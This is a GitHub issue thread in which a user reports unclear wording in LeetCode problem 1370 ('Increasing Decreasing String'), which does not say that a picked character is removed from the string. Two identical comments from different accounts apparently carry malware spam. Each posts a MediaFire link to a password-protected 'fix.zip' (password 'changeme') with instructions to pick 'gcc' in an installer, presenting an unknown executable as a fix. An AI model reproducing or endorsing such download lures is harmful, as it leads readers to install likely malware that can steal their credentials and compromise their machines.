### ISSUE TITLE
[BUG] - 1370. Increasing Decreasing String

### ISSUE THREAD

**Issue by yukuku** [LeetCode-Feedback/LeetCode-Feedback#23706]
### LeetCode Username

yukuku

### Problem Number, Title, and Link

1370. Increasing Decreasing String https://leetcode.com/problems/increasing-decreasing-string/

### Bug Category

Problem description

### Bug Description

> Pick the smallest character from s and append it to the result.

It doesn't specifically say that we are to remove the character from `s`.

### Language Used for Code

None

### Expected behavior

It should be 

> Pick and remove the smallest character from s and append it to the result.

Also for the other "pick" instructions.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
